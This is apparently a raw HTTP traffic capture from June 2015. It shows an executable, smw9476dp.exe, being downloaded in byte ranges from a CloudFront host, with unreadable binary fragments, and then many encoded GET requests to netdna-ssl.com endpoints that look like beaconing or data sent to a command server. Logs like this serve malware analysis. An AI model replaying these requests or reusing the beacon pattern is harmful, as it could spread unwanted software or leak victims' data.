X-Amz-Cf-Id: 777P3dlM6ylTqgTYnHKFZ_BBrQDGGcYFyfm4T8k9U7tG4sxiWxeXiQ==
.nj.m.P..V..%/...x..c.....h..x..$..8.^g..V...\.{..#2..?....#..^.FL.9..
[email protected]#O.....=5.9.(..i....T....Cv..-..u..i...CP..-..xk.T.
..m.,..V...........3.?T.....w....".....p A......3e..P.e....^.v.|.]D...
D...E.... {....pC.aO.^sz:U..}..!.,.Z,....4k..l ..>[email protected]..
5..-s.==..8p..;..4..!....Jr@3..]..........%.E.P.k#.e.....n ..E....1Xs6
......\S.,.....#g..n......Y.K.,4.y(...0...5............&.......<..n
*w..j.1a.>/...m.B..O.....ED.Pk..F.....z....#bC.>;...t^...a..9...
.&.......G...R................k..IW.C..iD...j.pp3...q.=....."'........
O.[....y....N.).....5..!..b..,.R..7'..2.A.[...F........E..c....u.*S)j.
.x ..T,...G.X...}Dd-?.Z..dm.e.......d4|.e-".}..1.r]{..L..&.. .D...%^..
......`...s.. ./-..QSl....VA....O 1.x..T......_......*.W.....3!...3...
JS..WZ.0..H..`9i........x.1M...x.c......]6......t].1.tRX.....Y.A.r.,..
.`iZ..|~.x...B....98...}......g...6.......'....x>H6.|...Ko.q...-...
..L.1q..=........d.L..53.x.>..;L..|B9.o....z..4...u0.l.g.<.w~.w.
..g..w.."......U.... .<[email protected]./..F.). M\...H...>.<|
!.d.AR... ......:.6.p.{v.-...9.......FI.fV....^d_`v..}....-.$.2..T.|b.
.7..Z.....A]@g..a.,.PDe7.............hu.......J.........*S...Q0m.d...&
gt;..o4g.>b.bo.K.-`....%.......>..z..O..}g....".rp.B>s..MAw.l
.......s.c.....<a.U...G....\..t.s.e"...|q..N.Z..cW".......=.....yL.
l..[..^...;Q...|(..l....8.4"......R...8=.>..B....B.~..b.Oq.@<9D.
...h`...WE"[email protected]..`.j....u.:R.y..... .....&.o....".Z `).L.k..
Y......c...R3h..Y./...\$.c}.<.....y.....0.r.E(..`hU*.[.}.q.[!..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:27 GMT

Content-Range: bytes 2250000-2499999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: AhDXD_VR1rZ55lTwOgCNT9lhwtogI2J_itTo1eFt68btaVIXK2eBgA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 20 Jun 2015 16:42:27 GMT..Content-Range: bytes 2250
000-2499999/3973864..X-Cache: Miss from cloudfront..Via: 1.1 c0d885177
8177ac6bc88a130d5510155.cloudfront.net (CloudFront)..X-Amz-Cf-Id: AhDX
D_VR1rZ55lTwOgCNT9lhwtogI2J_itTo1eFt68btaVIXK2eBgA==....5...N.au....H.
..E.....Z..a..;...h.<.P.{....S.0.....;...*.(d~O.t._.S.D.....*F.`q.b
.../~<.X..T........'.{.f..0..*.lD.<...NR.B'.2?.#.|CJ>Py..{$.k
..{.'..L|..,.\).>..Y.{.~_.*P:?BO>.:JN....z[..g...}....SX.L.Z..j.
........}x.8...r....V.........>_..e!V....W .. VQ...t....Mb;.yV.U...
.=.`C........G..n.p..y4....^.|.@.%..3....z..$.p..reu<?..W.......9..
.}..F.....u.. ..u....qwI.%{.{.....B8.I.....u.....\.h:Wz.i..... ..M6..&
gt;..<.#N#SyQJ....,.'..!T.....m..25..7......~y.....h.>....i...).
........3'_......oc....'.o.-.......D.R.U'.......[.K.;...........n,.^.|
vFw$.B....y..^Lt.....M.........E.Qb|S..I.-.o.}od.X.c.8y....wls...j....
.\.?Q<n.;..n.h"j\.j...<7.......^&4?!p#g..&..>c.^......n)E...F
....v.3O......t.!6;[O.>R?Q...V...._.dk[..X.....'4./Vc........k"B3x@
W....\.........m..Y.US.......W\>.G.........Ty.dR.w....m...o!...-...
V.X...0o.[9./*.,...%.&.CX..H6=.......t...,kk/.A.f.jqbu.w..j....q| ...#
N.....$.9E1b#6...O.. ..G.....................bc."...K"....hb......
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:28 GMT

Content-Range: bytes 2500000-2749999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 7Km8cuQKyQmpqICWQTy9ENvR1ktaDubQUvtXIbT9ykV70w_zuVAe2w==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 20 Jun 2015 16:42:28 GMT..Content-Range: bytes 2500
000-2749999/3973864..X-Cache: Miss from cloudfront..Via: 1.1 c0d885177
8177ac6bc88a130d5510155.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 7Km8
cuQKyQmpqICWQTy9ENvR1ktaDubQUvtXIbT9ykV70w_zuVAe2w==...N...&'$....d...
/..._d......S...N..... ..zd.~..(.H..~.|...;y.^.?.Y>).0..]....L..7F.
h.y.(...|r.r.-#a..P....J..\....4..s.....A...$?.g.....B.;2.8.58.....F(n
.%....*MLn.....d...9.v..zk.N.c.R..........N.}..l...].U.0...*..C.n.'..e
..:7..7......d..A...^..l.[E...$.E|....f.o .Tb....2..U(............(yZ7
[email protected];... .O.......[....(}.-Q.....].LC.....Ln;....\..R......
.........J..j}V.-:....`T..=5.8.2.u...V.G.*.F.1*....h.h}..$...T(.SC....
...{<.]...WK...,.c.([email protected])S..%......<...K.
. E..VI........WG.1<.../....Am)...:...HP......kl...<...r..Ll$o./
....w..r.K.o.5.z.k..0C...N..N...Z.k]...7.)h..".}.o...A....#.{/........
.QR.Qb..n....d0..?./.. W.Z..^..hW...........J.0.t..M..I.|...i...Xw3...
.l/).......a..K.......6..48T..O.....7.7..{,1{....b./.....&Q.1Xu...._.?
.\%..W....M..c...<...W..SX:.Gp...3.ED...q..=m..G$.A.!M?.a..Za..Z...
.&...R..Dy.`Y>...b.pr`..[.....6.Uo..T..... ..,..a$S..j.ZR\rZz.?....
..F.....'.....l..Q.w.....(.j...]w.]..5mAg..G..L.....p.W1......1k..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3500000-3749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 10:08:54 GMT

Content-Range: bytes 3500000-3749999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: AaT-x9jFRvV9e77Mt0onGmR1xCZQZKEwDrBlzXJ39dLkwZPem-61nA==
..a.....8%..............J...........*.......'...P.....C....l......p...
.|.4.c ..6.V....[9/|=..j.VNr....!.f^..............`....R.]....,2F~....
.w9.]61..|..,Wu...77.,.ft#..~......!&N.|..mv..z.-.Io..{=.0.....,Ky.I.F
.^h.......t..l..l.=,..n.X.-c.N...6?...5M.m...l.$l...h1.Q-.....3. cg.Vm
...3..i1....t..H..(....Y0..P...{..M..!KBaq.,n....09.J............0....
C.,....s...V.1.5.6...D...D........A`s.-.._Q^a.....C5.~.x..e^>d.$.,'
r...0#.-6q..<......h.HMR.4.4]...,..x...L...V.!6..T<..D.B..-._q!!
Ib.'..&C....K...[kl..C...*M*...h......../. -Y...g.UU..0..k:a....x.....
<.c..........Z...fO.G..O}..8]K..........b..(..C...\....b....."..a..
....fF...iI."..^/.KO..2.d..?} 9.Q..^L%..#..k.`p}Y_M./....j'..h........
......#..5Y.M..H-.Iu..^...#..I.*.i..2Xqx%.#..;.mZ..$.-*|.9L...f.`..;o.
..8..*.f./!i)T...O.Fj..NM....?ji..3gHp...([email protected].|........rG.(<d..
[email protected]|.2r....=vGXH.D..-v|..]r...?BYi......}..m....w....`K
I.'...p/...q....N1.c..D.N.o......v...&%l.Y.".d..EUk......E....}......I
19m&[".....~l.<.7..<.....m.........<.c..z".1........]p..tZ...
.....?.n.x....eI....;)......,u..2...'...y.dY`xf.U...%.O&.V.D..(...V#E1
2....D.^jA..$Dk.T.e.>hL1..'tb3M..c,D.H=...cTsY..U_j_b...4.q.}lIh.u.
.3 ..a;[8.!<.....M..R.;_.:.....lr...Q..=...G.e.;O.x=F...[; ...d....
d..=.t...../&.!..9\..A.=.../.A..R@_..Z"S.K. ..g....c..;!.Y.v.N..\.....
.......w.#S:..*t........T.E(.......(..Tv7..3|..b....g.|p!.....VY#.Nt.j
C;)[.. ....%.q.....~L.O..pG.I...$.... 4....".....{.....H1...p..,...Q!.
E..g..Q..4.8.$Y..rZQR.c.........d.L>., .....x.d...V.Pjk.U..H...
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3750000-3973863

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 223864

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 10:08:54 GMT

Content-Range: bytes 3750000-3973863/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: XXvIccCBTcaKK4duRihWsT5oggijbxBCv6jroUiFQa9a1Zd06aw1CA==
S....V..j...#P.....&..'.......6;.|a=...|.n:.O.<......9KOn.C_......,
..1...f...m..Z......hy....E..{.q.O.A.X.`{......._.=N%.Y.R.g...K2~..q.{
..:.9.<...i..00.?..4WW..L.4.&.K.1.-..L...!S.fL...i.."..R.u.........
.O.o.D..x...k......a...wh.h4.`.Q...."0B'.}.'.... )..:.x>H.g..~@... 
. ...OIj.9j_g........0.......(.s7..."..{.h4.T."...5.$r,:.i..D..%..a...
...OC....~k>...B.E..AdaN..S|s.iI........fi.Abp.Y.N'.c.7.9.....'.&[.
......Iy.?..6..(.:.6.......4(c^oQ;.1....PRE......pn..j."ku...0...].A..
....),...e....HK&..N^e......Y...F-..N....k..Lh*...`....L...kU..qc....V
..w...1.../.......?.<.}5j.Xyn.....)G..g....WImj.m.....H......'~.NU.
Z..R.^.....)...|.V...d...M..k{.*....8......C..K.OS&q3/#.).n........_..
6.t.h.j..Ob..V.gr.v r..X.2.W.^A `y..rr.pn..9'.w........._l..u#.s.w...;
P...tlEf..G...g...~.I..k.../.;..|...H..s...6r.......>w...5%t.X.....
9<]b......4A..,....Fhb.J..|-.}........F.C^.k...6.a..........y.@l.._
..L.8.#U.........RWc3doi.zT... ."CJW...5..F.n......hN C.Z.5.%@...b|..T
....o.$.b.p......X....%..yiq..6~G........Bk...E..=(...6T.<..M....9@
%.yj1..}O..S.).....M...U.T.W.w:<4..aO.]....EO..*PVbz...........|..^
.G. ..2...|.,.y..@.............*a.......7..YM..- ....d.....{.n.Y..Z.I.
*/.u...$......4.*_L...k86.`.s.!.........7..H.' .*...T67ik2..E...x...R.
..×..1..5E.-..x......\J{...M!/..2s...._..J..W.dm......S..4Y.ak..V...
.'FK0...4...>PD6-......dn..x.F.8k. A.[..l....V..o..oH.t....Z..P.x..
.^..>........8......m.F?j..;.....Gb(...c.. .....q...Os.([.g=.2...^/
..lV.aE.lJ..I...|...D.9....:'.Y........Z.....U...!}.".].. l.N....[
<<< skipped >>>

GET /6765.ashx?e=EYAmqppYZO/i yJL96 IZU84EaaibZpXIM0CqmsRfbtxTYwWxYG9WJimSgauFBdeEsZQDBxy5lr5LE/y8BOUO1 JfVwpv1Wv16XIqLxILHtgx1Ht egA6cURUFmYOWrgEoo okeITCw2Yh 7VFNWqMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:27 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=hNMAVKhukrzd/jwMCMorqlIbJ3lei9qRFFEkkZkHITf UINFgbXOio5xPF2gxegOjOluN4MfK82okOeVQ5E0okWABgPsiU45eV3BT5p 3i82tY9Td8QpDPaXvTubhUukT8hXp 3YGKZG16Dbbuw50hA rrlAl6KaauY01Zje2rmTRcHKuVeTpZhKEBix7LJLFAL52sIXt4X12PzaCDxRh1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBcgN Ty9FJY0O7fFnRtDe1osnNJHL5mEh8= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:28 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=HW4rWVRtARichLpJKTn3oLklMdOIhOLd/ToTRiVFxVRrBKqdyQvXy8FqjxctBQAySlCyq068/M1FOTAwlw8YFyA35PL0UljQ7t8WdG0N7Wiyc0kcvmYSH3wF8xC533Fc3O89Ayj8kQ7bE9IZ6eRB7nhwS90frqE9eqfOL09Waq7Xt7qcDfFhJwTxIUcsgQ w0lltQMIgF4KzLEuYDNscrECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndCjJOeMgbCwMerDm9mrmXfxWLNavPPYBqdX6Jp8PTHj8= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:28 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....

GET /6765.ashx?e=Feo0TQZfu6KMgv8CEawhJtJUmOkut48zXLWW3smKBNHCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9Ky1lAgh0GvRJFCsfbigoJtBcxpwjbkEKEepEygzZ5HCHBgq eNMUDOF5rLdz0lnXn574r1XQZFERLoBlFznl6CF8XIwY4UXEFgs IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGAGu  mQn2fsDvRuoolmbVZILFqDk7m7hD82t84QhMzI= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=uWabAt9SLcyBuMQa44hX0JareFt XS7lnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFY9h8tK883C8fdiLeSnalixJzCW7YT37a3xsgiMVE/woTJ0gxPZGJkwMj0/D5C5pj64N7FAIfKHD0333RAvM0VMC09xUUAqoccNCUHeR8YCF3RMhMhveZGB//nVFcIvcEaWEp0t/VLWlqBPWgrOywYH8uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45eV3BT5p 3i82tY9Td8QpDEwW1x05BqOf HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRobDlUjOI3FcBs IILilpWF3zNK4whhQy Y93IDHD2utNjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUd9hJVkTDQWh4fmsDki7RvBFb1hgnFCGg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoRQC4gKM3p050JQd5HxgIXdsn45NULvy1Tc6i7r/RwOX4hMYvtqILweTZ3JhHXtVg4LlYGh62K7VQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd0KMk54yBsLAx6sOb2auZd/FYs1q889gGp1fomnw9MePw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoW16pnq3EtsLKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PDge2J5meb7mV gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBcgN Ty9FJY0O7fFnRtDe1osnNJHL5mEh8= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoX4r3S9aDbaOBPEhRyyBD7D0lOwqSwnORz0Z05yANjzcUdHLbi5Fo13kPWZgf7JA3i5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjl5XcFPmn7eLza1j1N3xCkMTBbXHTkGo58= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=c0XmKevqA0lSGyd5XovakSbVQUa08Zx3/lCDRYG1zoogLxC0aXqYrSdIMT2RiZMDI9Pw QuaY uDexQCHyhw9OLt6BhzfOsD0FbaakihgO1P17LdzRwGrcSywkF18Bl8KIVyy9nVE95oyD6CU7dt4Wn8ksZ3j7x1gsDoUhkcyDa4XSJ2T /Zj2VSvOHNjNGn6gNHgF/q1DvbBptC4f3pHrdTkDoD53M3v4ojYShxKAxAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=EYAmqppYZO/i yJL96 IZU84EaaibZpXIM0CqmsRfbtxTYwWxYG9WJimSgauFBdeEsZQDBxy5lr5LE/y8BOUO1 JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRF7gBtB5 kYUpdpaCi3i8nACSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....

GET /6765.ashx?e=4mC0vXGWFtoLjT49fHfOTLvsi0J15i T/Dn8i7qp5mBrRPNUypxOtyiJpOuGuO 6ghmiZJc6KBe9Kbi6m4oCRgBrvvpkJ9n7A70bqKJZm1WSCxag5O5u4W iVxYuINcnTc/ TiC/QQMa8vvz4viJlg2RP94xFG3Lj0N7bp/0QtRAkqBmtM5btymF904v4t2DqIs V7Ds6CRuZZIi5/tojjeFKyzEEA2TzBaKXaEKdzFwqwK4Z/LB/gEuwwpt2SWXjaQSUVKXu21L8ExzavHCoY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VHfYSVZEw0FoeH5rA5Iu0bwRW9YYJxQho= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:27 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=uWabAt9SLcyBuMQa44hX0JareFt XS7lnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFY9h8tK883C8fdiLeSnalixJzCW7YT37a3xsgiMVE/woTJ0gxPZGJkwMj0/D5C5pj64N7FAIfKHD0333RAvM0VMCmW8V 3HOBw6zlVDGOOxKoKYX3Ti/i3YOrZUJO2Bj2/OMlN/XaXrTyjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUd9hJVkTDQWh4fmsDki7RvBFb1hgnFCGg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:28 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=uWabAt9SLcyBuMQa44hX0JareFt XS7lnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFY9h8tK883C8fdiLeSnalixJzCW7YT37a3xsgiMVE/woTJ0gxPZGJkwMj0/D5C5pj64N7FAIfKHD0333RAvM0VMBgGShWQDHBOLQNwltuHU7XLtUlyKtO7SYPgAY8ePzFZz2k/iRtBvqTxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSstZQIIdBr0SRQrH24oKCbQVdmcdQ2CixaA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:28 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....

GET /t.ashx?e=wlkQ3WKgYpSt /KxvF2yaltE/YbzB hRnvZi s3jtzHZ5YIGg5oNPk/IV6ft2BimRteg227sOdIp0kvsY0HPnNlsH9PMWVgeYCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: gk36g6j-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:21 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=wlkQ3WKgYpSt /KxvF2yaltE/YbzB hRnvZi s3jtzHZ5YIGg5oNPk/IV6ft2BimRteg227sOdIp0kvsY0HPnNlsH9PMWVgeYCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: gk36g6j-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

